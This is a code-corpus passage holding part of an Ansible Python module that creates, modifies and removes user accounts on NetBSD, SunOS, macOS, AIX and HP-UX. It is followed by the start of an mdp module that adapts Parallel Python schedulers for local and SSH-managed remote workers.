if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups_option = '-G'
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_option = '-S'
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append(groups_option)
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
# find current login class
user_login_class = None
userinfo_cmd = [self.module.get_bin_path('userinfo', True), self.name]
(rc, out, err) = self.execute_command(userinfo_cmd)
for line in out.splitlines():
tokens = line.split()
if tokens[0] == 'class' and len(tokens) == 2:
user_login_class = tokens[1]
# act only if login_class change
if self.login_class != user_login_class:
cmd.append('-L')
cmd.append(self.login_class)
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
elif self.module.check_mode:
return (0, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
# ===========================================
class NetBSDUser(User):
"""
This is a NetBSD User manipulation class.
Main differences are that NetBSD:-
- has no concept of "system" account.
- has no force delete user
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'NetBSD'
distribution = None
SHADOWFILE = '/etc/master.passwd'
def create_user(self):
cmd = [self.module.get_bin_path('useradd', True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
if len(groups) > 16:
self.module.fail_json(msg="Too many groups (%d) NetBSD allows for 16 max." % len(groups))
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.createhome:
cmd.append('-m')
cmd.append(self.name)
return self.execute_command(cmd)
def remove_user_userdel(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def modify_user(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups = set(current_groups).union(groups)
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
if len(groups) > 16:
self.module.fail_json(msg="Too many groups (%d) NetBSD allows for 16 max." % len(groups))
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
elif self.module.check_mode:
return (0, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
# ===========================================
class SunOS(User):
"""
This is a SunOS User manipulation class - The main difference between
this class and the generic user class is that Solaris-type distros
don't support the concept of a "system" account and we need to
edit the /etc/shadow file manually to set a password. (Ugh)
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'SunOS'
distribution = None
SHADOWFILE = '/etc/shadow'
def remove_user(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def create_user(self):
cmd = [self.module.get_bin_path('useradd', True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.createhome:
cmd.append('-m')
cmd.append(self.name)
if self.module.check_mode:
return (0, '', '')
else:
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
# we have to set the password by editing the /etc/shadow file
if self.password is not None:
try:
lines = []
for line in open(self.SHADOWFILE, 'rb').readlines():
fields = line.strip().split(':')
if not fields[0] == self.name:
lines.append(line)
continue
fields[1] = self.password
fields[2] = str(int(time.time() / 86400))
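# the third shadow field (lastchg) records the password change date as
# days since the epoch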
line = ':'.join(fields)
lines.append('%s\n' % line)
open(self.SHADOWFILE, 'w+').writelines(lines)
except Exception, err:
self.module.fail_json(msg="failed to update users password: %s" % str(err))
return (rc, out, err)
def modify_user_usermod(self):
cmd = [self.module.get_bin_path('usermod', True)]
cmd_len = len(cmd)
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
groups_need_mod = False
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
new_groups = groups
if self.append:
new_groups.update(current_groups)
cmd.append(','.join(new_groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.module.check_mode:
return (0, '', '')
else:
# modify the user if cmd will do anything
if cmd_len != len(cmd):
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
else:
(rc, out, err) = (None, '', '')
# we have to set the password by editing the /etc/shadow file
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
try:
lines = []
for line in open(self.SHADOWFILE, 'rb').readlines():
fields = line.strip().split(':')
if not fields[0] == self.name:
lines.append(line)
continue
fields[1] = self.password
fields[2] = str(int(time.time() / 86400))
line = ':'.join(fields)
lines.append('%s\n' % line)
open(self.SHADOWFILE, 'w+').writelines(lines)
rc = 0
except Exception, err:
self.module.fail_json(msg="failed to update users password: %s" % str(err))
return (rc, out, err)
# ===========================================
class DarwinUser(User):
"""
This is a Darwin Mac OS X User manipulation class.
Main differences are that Darwin:-
- Handles accounts in a database managed by dscl(1)
- Has no useradd/groupadd
- Does not create home directories
- User password must be cleartext
- UID must be given
- System users must be under 500
This overrides the following methods from the generic class:-
- user_exists()
- create_user()
- remove_user()
- modify_user()
"""
platform = 'Darwin'
distribution = None
SHADOWFILE = None
dscl_directory = '.'
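# mapping of module options to the dscl user record attributes they populate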
fields = [
('comment', 'RealName'),
('home', 'NFSHomeDirectory'),
('shell', 'UserShell'),
('uid', 'UniqueID'),
('group', 'PrimaryGroupID'),
]
def _get_dscl(self):
return [ self.module.get_bin_path('dscl', True), self.dscl_directory ]
def _list_user_groups(self):
cmd = self._get_dscl()
cmd += [ '-search', '/Groups', 'GroupMembership', self.name ]
(rc, out, err) = self.execute_command(cmd)
groups = []
for line in out.splitlines():
if line.startswith(' ') or line.startswith(')'):
continue
groups.append(line.split()[0])
return groups
def _get_user_property(self, property):
'''Return user PROPERTY as given by dscl(1) read, or None if not found.'''
cmd = self._get_dscl()
cmd += [ '-read', '/Users/%s' % self.name, property ]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
return None
# from dscl(1)
# if property contains embedded spaces, the list will instead be
# displayed one entry per line, starting on the line after the key.
lines = out.splitlines()
#sys.stderr.write('*** |%s| %s -> %s\n' % (property, out, lines))
if len(lines) == 1:
return lines[0].split(': ')[1]
else:
if len(lines) > 2:
return '\n'.join([ lines[1].strip() ] + lines[2:])
else:
if len(lines) == 2:
return lines[1].strip()
else:
return None
def _change_user_password(self):
'''Change password for SELF.NAME against SELF.PASSWORD.
Please note that the password must be cleartext.
'''
# some documentation on how is stored passwords on OSX:
# http://blog.lostpassword.com/2012/07/cracking-mac-os-x-lion-accounts-passwords/
# http://null-byte.wonderhowto.com/how-to/hack-mac-os-x-lion-passwords-0130036/
# http://pastebin.com/RYqxi7Ca
# on OSX 10.8+ hash is SALTED-SHA512-PBKDF2
# https://pythonhosted.org/passlib/lib/passlib.hash.pbkdf2_digest.html
# https://gist.github.com/nueh/8252572
cmd = self._get_dscl()
if self.password:
cmd += [ '-passwd', '/Users/%s' % self.name, self.password]
else:
cmd += [ '-create', '/Users/%s' % self.name, 'Password', '*']
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Error when changing password',
err=err, out=out, rc=rc)
return (rc, out, err)
def _make_group_numerical(self):
'''Convert SELF.GROUP to its numerical GID value, as a string suitable for dscl.'''
if self.group is not None:
try:
self.group = grp.getgrnam(self.group).gr_gid
except KeyError:
self.module.fail_json(msg='Group "%s" not found. Try to create it first using "group" module.' % self.group)
# We need to pass a string to dscl
self.group = str(self.group)
def __modify_group(self, group, action):
'''Add SELF.NAME to or remove it from GROUP depending on ACTION.
ACTION can be 'add' or 'remove'; anything else is treated as 'remove'. '''
if action == 'add':
option = '-a'
else:
option = '-d'
cmd = [ 'dseditgroup', '-o', 'edit', option, self.name,
'-t', 'user', group ]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot %s user "%s" to group "%s".'
% (action, self.name, group),
err=err, out=out, rc=rc)
return (rc, out, err)
def _modify_group(self):
'''Synchronize SELF.NAME's group membership with SELF.GROUPS, adding
missing groups and removing surplus ones. '''
rc = 0
out = ''
err = ''
changed = False
current = set(self._list_user_groups())
if self.groups is not None:
target = set(self.groups.split(','))
else:
target = set([])
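# drop memberships not in the target set, then add the missing ones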
for remove in current - target:
(_rc, _err, _out) = self.__modify_group(remove, 'delete')
rc += _rc
out += _out
err += _err
changed = True
for add in target - current:
(_rc, _err, _out) = self.__modify_group(add, 'add')
rc += _rc
out += _out
err += _err
changed = True
return (rc, err, out, changed)
def _update_system_user(self):
'''Hide or show the user on the login window according to SELF.SYSTEM.
Returns 0 if a change has been made, None otherwise.'''
plist_file = '/Library/Preferences/com.apple.loginwindow.plist'
# http://support.apple.com/kb/HT5017?viewlocale=en_US
uid = int(self.uid)
cmd = [ 'defaults', 'read', plist_file, 'HiddenUsersList' ]
(rc, out, err) = self.execute_command(cmd)
# returned value is
# (
# "_userA",
# "_UserB",
# userc
# )
hidden_users = []
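# parse the plist-style array output, stripping the surrounding quotes
# from each entry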
for x in out.splitlines()[1:-1]:
try:
x = x.split('"')[1]
except IndexError:
x = x.strip()
hidden_users.append(x)
if self.system:
if not self.name in hidden_users:
cmd = [ 'defaults', 'write', plist_file,
'HiddenUsersList', '-array-add', self.name ]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(
msg='Cannot user "%s" to hidden user list.'
% self.name, err=err, out=out, rc=rc)
return 0
else:
if self.name in hidden_users:
del(hidden_users[hidden_users.index(self.name)])
cmd = [ 'defaults', 'write', plist_file,
'HiddenUsersList', '-array' ] + hidden_users
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(
msg='Cannot remove user "%s" from hidden user list.'
% self.name, err=err, out=out, rc=rc)
return 0
def user_exists(self):
'''Check if SELF.NAME is a known user on the system.'''
cmd = self._get_dscl()
cmd += [ '-list', '/Users/%s' % self.name]
(rc, out, err) = self.execute_command(cmd)
return rc == 0
def remove_user(self):
'''Delete SELF.NAME. If SELF.FORCE is true, remove its home directory.'''
info = self.user_info()
cmd = self._get_dscl()
cmd += [ '-delete', '/Users/%s' % self.name]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(
msg='Cannot delete user "%s".'
% self.name, err=err, out=out, rc=rc)
if self.force:
if os.path.exists(info[5]):
shutil.rmtree(info[5])
out += "Removed %s" % info[5]
return (rc, out, err)
def create_user(self, command_name='dscl'):
cmd = self._get_dscl()
cmd += [ '-create', '/Users/%s' % self.name]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(
msg='Cannot create user "%s".'
% self.name, err=err, out=out, rc=rc)
self._make_group_numerical()
# Homedir is not created by default
if self.createhome:
if self.home is None:
self.home = '/Users/%s' % self.name
if not os.path.exists(self.home):
os.makedirs(self.home)
self.chown_homedir(int(self.uid), int(self.group), self.home)
for field in self.fields:
if self.__dict__.has_key(field[0]) and self.__dict__[field[0]]:
cmd = self._get_dscl()
cmd += [ '-create', '/Users/%s' % self.name,
field[1], self.__dict__[field[0]]]
(rc, _err, _out) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(
msg='Cannot add property "%s" to user "%s".'
% (field[0], self.name), err=err, out=out, rc=rc)
out += _out
err += _err
if rc != 0:
return (rc, _err, _out)
(rc, _err, _out) = self._change_user_password()
out += _out
err += _err
self._update_system_user()
# here we don't care about change status since it is a creation,
# thus changed is always true.
(rc, _out, _err, changed) = self._modify_group()
out += _out
err += _err
return (rc, err, out)
def modify_user(self):
changed = None
out = ''
err = ''
self._make_group_numerical()
for field in self.fields:
if self.__dict__.has_key(field[0]) and self.__dict__[field[0]]:
current = self._get_user_property(field[1])
if current is None or current != self.__dict__[field[0]]:
cmd = self._get_dscl()
cmd += [ '-create', '/Users/%s' % self.name,
field[1], self.__dict__[field[0]]]
(rc, _err, _out) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(
msg='Cannot update property "%s" for user "%s".'
% (field[0], self.name), err=err, out=out, rc=rc)
changed = rc
out += _out
err += _err
if self.update_password == 'always':
(rc, _err, _out) = self._change_user_password()
out += _out
err += _err
changed = rc
(rc, _out, _err, _changed) = self._modify_group()
out += _out
err += _err
if _changed is True:
changed = rc
rc = self._update_system_user()
if rc == 0:
changed = rc
return (changed, out, err)
# ===========================================
class AIX(User):
"""
This is an AIX User manipulation class.
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'AIX'
distribution = None
SHADOWFILE = '/etc/security/passwd'
def remove_user(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def create_user_useradd(self, command_name='useradd'):
cmd = [self.module.get_bin_path(command_name, True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None and len(self.groups):
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.createhome:
cmd.append('-m')
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
# set password with chpasswd
if self.password is not None:
cmd = []
cmd.append(self.module.get_bin_path('chpasswd', True))
cmd.append('-e')
cmd.append('-c')
self.execute_command(' '.join(cmd), data="%s:%s" % (self.name, self.password))
return (rc, out, err)
def modify_user_usermod(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
# skip if no changes to be made
if len(cmd) == 1:
(rc, out, err) = (None, '', '')
elif self.module.check_mode:
return (True, '', '')
else:
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
# set password with chpasswd
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd = []
cmd.append(self.module.get_bin_path('chpasswd', True))
cmd.append('-e')
cmd.append('-c')
(rc2, out2, err2) = self.execute_command(' '.join(cmd), data="%s:%s" % (self.name, self.password))
else:
(rc2, out2, err2) = (None, '', '')
if rc != None:
return (rc, out+out2, err+err2)
else:
return (rc2, out+out2, err+err2)
# ===========================================
class HPUX(User):
"""
This is an HP-UX User manipulation class.
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'HP-UX'
distribution = None
SHADOWFILE = '/etc/shadow'
def create_user(self):
cmd = ['/usr/sam/lbin/useradd.sam']
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None and len(self.groups):
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.createhome:
cmd.append('-m')
else:
cmd.append('-M')
if self.system:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def remove_user(self):
cmd = ['/usr/sam/lbin/userdel.sam']
if self.force:
cmd.append('-F')
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def modify_user(self):
cmd = ['/usr/sam/lbin/usermod.sam']
info = self.user_info()
has_append = self._check_usermod_append()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set(remove_existing=False)
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
if has_append:
cmd.append('-a')
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
if self.append and not has_append:
cmd.append('-A')
cmd.append(','.join(group_diff))
else:
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
cmd.append('-d')
cmd.append(self.home)
if self.move_home:
cmd.append('-m')
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
elif self.module.check_mode:
return (0, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
# ===========================================
def main():
ssh_defaults = {
'bits': '2048',
'type': 'rsa',
'passphrase': None,
'comment': 'ansible-generated on %s' % socket.gethostname()
}
module = AnsibleModule(
argument_spec = dict(
state=dict(default='present', choices=['present', 'absent'], type='str'),
name=dict(required=True, aliases=['user'], type='str'),
uid=dict(default=None, type='str'),
non_unique=dict(default='no', type='bool'),
group=dict(default=None, type='str'),
groups=dict(default=None, type='str'),
comment=dict(default=None, type='str'),
home=dict(default=None, type='str'),
shell=dict(default=None, type='str'),
password=dict(default=None, type='str'),
login_class=dict(default=None, type='str'),
# following options are specific to userdel
force=dict(default='no', type='bool'),
remove=dict(default='no', type='bool'),
# following options are specific to useradd
createhome=dict(default='yes', type='bool'),
system=dict(default='no', type='bool'),
# following options are specific to usermod
move_home=dict(default='no', type='bool'),
append=dict(default='no', type='bool'),
# following are specific to ssh key generation
generate_ssh_key=dict(type='bool'),
ssh_key_bits=dict(default=ssh_defaults['bits'], type='str'),
ssh_key_type=dict(default=ssh_defaults['type'], type='str'),
ssh_key_file=dict(default=None, type='str'),
ssh_key_comment=dict(default=ssh_defaults['comment'], type='str'),
ssh_key_passphrase=dict(default=None, type='str'),
update_password=dict(default='always',choices=['always','on_create'],type='str'),
expires=dict(default=None, type='float'),
),
supports_check_mode=True
)
user = User(module)
if user.syslogging:
syslog.openlog('ansible-%s' % os.path.basename(__file__))
syslog.syslog(syslog.LOG_NOTICE, 'User instantiated - platform %s' % user.platform)
if user.distribution:
syslog.syslog(syslog.LOG_NOTICE, 'User instantiated - distribution %s' % user.distribution)
rc = None
out = ''
err = ''
result = {}
result['name'] = user.name
result['state'] = user.state
if user.state == 'absent':
if user.user_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = user.remove_user()
if rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
result['force'] = user.force
result['remove'] = user.remove
elif user.state == 'present':
if not user.user_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = user.create_user()
result['system'] = user.system
result['createhome'] = user.createhome
else:
# modify user (note: this function is check mode aware)
(rc, out, err) = user.modify_user()
result['append'] = user.append
result['move_home'] = user.move_home
if rc is not None and rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
if user.password is not None:
result['password'] = 'NOT_LOGGING_PASSWORD'
if rc is None:
result['changed'] = False
else:
result['changed'] = True
if out:
result['stdout'] = out
if err:
result['stderr'] = err
if user.user_exists():
info = user.user_info()
if info == False:
result['msg'] = "failed to look up user name: %s" % user.name
result['failed'] = True
result['uid'] = info[2]
result['group'] = info[3]
result['comment'] = info[4]
result['home'] = info[5]
result['shell'] = info[6]
result['uid'] = info[2]
if user.groups is not None:
result['groups'] = user.groups
# handle missing homedirs
info = user.user_info()
if user.home is None:
user.home = info[5]
if not os.path.exists(user.home) and user.createhome:
if not module.check_mode:
user.create_homedir(user.home)
user.chown_homedir(info[2], info[3], user.home)
result['changed'] = True
# deal with ssh key
if user.sshkeygen:
(rc, out, err) = user.ssh_key_gen()
if rc is not None and rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
if rc == 0:
result['changed'] = True
(rc, out, err) = user.ssh_key_fingerprint()
if rc == 0:
result['ssh_fingerprint'] = out.strip()
else:
result['ssh_fingerprint'] = err.strip()
result['ssh_key_file'] = user.get_ssh_key_path()
result['ssh_public_key'] = user.get_ssh_public_key()
module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import *
main()
|
gpl-3.0
|
ME-ICA/me-ica
|
meica.libs/mdp/parallel/pp_support.py
|
1
|
13771
|
"""
Adapters for the Parallel Python library (http://www.parallelpython.com).
The PPScheduler class uses an existing pp scheduler and is a simple adapter.
LocalPPScheduler includes the creation of a local pp scheduler.
NetworkPPScheduler includes the management of the remote slaves via SSH.
"""
from __future__ import with_statement
import sys
import os
import time
import subprocess
import signal
import traceback
import tempfile
import scheduling
import pp
import mdp
TEMPDIR_PREFIX='pp4mdp-monkeypatch.'
def _monkeypatch_pp(container_dir):
"""Apply a hack for http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=620551.
Importing numpy fails because the parent directory of the slave
script (/usr/share/pyshared) is added to the beginning of sys.path.
This is a temporary fix until parallel python or the way it is
packaged in debian is changed.
This function monkey-patches the ppworker module and changes the
path to the slave script. A temporary directory is created and the
worker script is copied there.
The temporary directory should be automatically removed when this
module is destroyed.
XXX: remove this when parallel python or the way it is packaged in debian is changed.
"""
import os.path, shutil
# this part copied from pp.py, should give the same result hopefully
ppworker = os.path.join(os.path.dirname(os.path.abspath(pp.__file__)),
'ppworker.py')
global _ppworker_dir
_ppworker_dir = mdp.utils.TemporaryDirectory(prefix=TEMPDIR_PREFIX, dir=container_dir)
ppworker3 = os.path.join(_ppworker_dir.name, 'ppworker.py')
shutil.copy(ppworker, ppworker3)
mdp._pp_worker_command = pp._Worker.command[:]
try:
pp._Worker.command[pp._Worker.command.index(ppworker)] = ppworker3
except TypeError:
# pp 1.6.0 compatibility
pp._Worker.command = pp._Worker.command.replace(ppworker, ppworker3)
if hasattr(mdp.config, 'pp_monkeypatch_dirname'):
_monkeypatch_pp(mdp.config.pp_monkeypatch_dirname)
class PPScheduler(scheduling.Scheduler):
"""Adaptor scheduler for the parallel python scheduler.
This scheduler is a simple wrapper for a pp server. A pp server instance
has to be provided.
"""
def __init__(self, ppserver, max_queue_length=1,
result_container=None, verbose=False):
"""Initialize the scheduler.
ppserver -- Parallel Python Server instance.
max_queue_length -- How long the queue can get before add_task blocks.
result_container -- ResultContainer used to store the results.
ListResultContainer by default.
verbose -- If True, progress reports are printed by the scheduler.
"""
if result_container is None:
result_container = scheduling.ListResultContainer()
super(PPScheduler, self).__init__(result_container=result_container,
verbose=verbose)
self.ppserver = ppserver
self.max_queue_length = max_queue_length
def _process_task(self, data, task_callable, task_index):
"""Non-blocking processing of tasks.
Depending on the scheduler state this function is non-blocking or
blocking. One reason for blocking can be a full task-queue.
"""
task = (data, task_callable.fork(), task_index)
def execute_task(task):
"""Call the first args entry and return the return value."""
data, task_callable, task_index = task
task_callable.setup_environment()
return task_callable(data), task_index
while True:
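# peek at pp's internal (name-mangled) job queue to apply back-pressure
# once it grows beyond max_queue_length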
if len(self.ppserver._Server__queue) > self.max_queue_length:
# release lock for other threads and wait
self._lock.release()
time.sleep(0.5)
self._lock.acquire()
else:
# release lock to enable result storage
self._lock.release()
# the inner tuple is a trick to prevent introspection by pp
# this forces pp to simply pickle the object
self.ppserver.submit(execute_task, args=(task,),
callback=self._pp_result_callback)
break
def _pp_result_callback(self, result):
"""Calback method for pp to unpack the result and the task id.
This method then calls the normal _store_result method.
"""
if result is None:
result = (None, None)
self._store_result(*result)
def _shutdown(self):
"""Call destroy on the ppserver."""
self.ppserver.destroy()
class LocalPPScheduler(PPScheduler):
"""Uses a local pp server to distribute the work across cpu cores.
The pp server is created automatically instead of being provided by the
user (in contrast to PPScheduler).
"""
def __init__(self, ncpus="autodetect", max_queue_length=1,
result_container=None, verbose=False):
"""Create an internal pp server and initialize the scheduler.
ncpus -- Integer or 'autodetect', specifies the number of processes
used.
max_queue_length -- How long the queue can get before add_task blocks.
result_container -- ResultContainer used to store the results.
ListResultContainer by default.
verbose -- If True, progress reports are printed by the scheduler.
"""
ppserver = pp.Server(ncpus=ncpus)
super(LocalPPScheduler, self).__init__(ppserver=ppserver,
max_queue_length=max_queue_length,
result_container=result_container,
verbose=verbose)
# default secret
SECRET = "rosebud"
class NetworkPPScheduler(PPScheduler):
"""Scheduler which can manage pp remote servers (requires SSH).
The remote slave servers are automatically started and killed at the end.
Since the slaves are started via SSH this scheduler does not work on normal
Windows systems. On such systems you can start the pp slaves
manually and then use the standard PPScheduler.
"""
def __init__(self, max_queue_length=1,
result_container=None,
verbose=False,
remote_slaves=None,
source_paths=None,
port=50017,
secret=SECRET,
nice=-19,
timeout=3600,
n_local_workers=0,
slave_kill_filename=None,
remote_python_executable=None):
"""Initialize the remote slaves and create the internal pp scheduler.
result_container -- ResultContainer used to store the results.
ListResultContainer by default.
verbose -- If True, progress reports are printed by the scheduler.
remote_slaves -- List of tuples, the first tuple entry is a string
containing the name or IP address of the slave, the second entry
contains the number of processes (i.e. the pp ncpus parameter).
The second entry can be None to use 'autodetect'.
source_paths -- List of paths that will be appended to sys.path in the
slaves.
n_local_workers -- Value of ncpus for this machine.
secret -- Secret password to secure the remote slaves.
slave_kill_filename -- Filename (including path) where a list of the
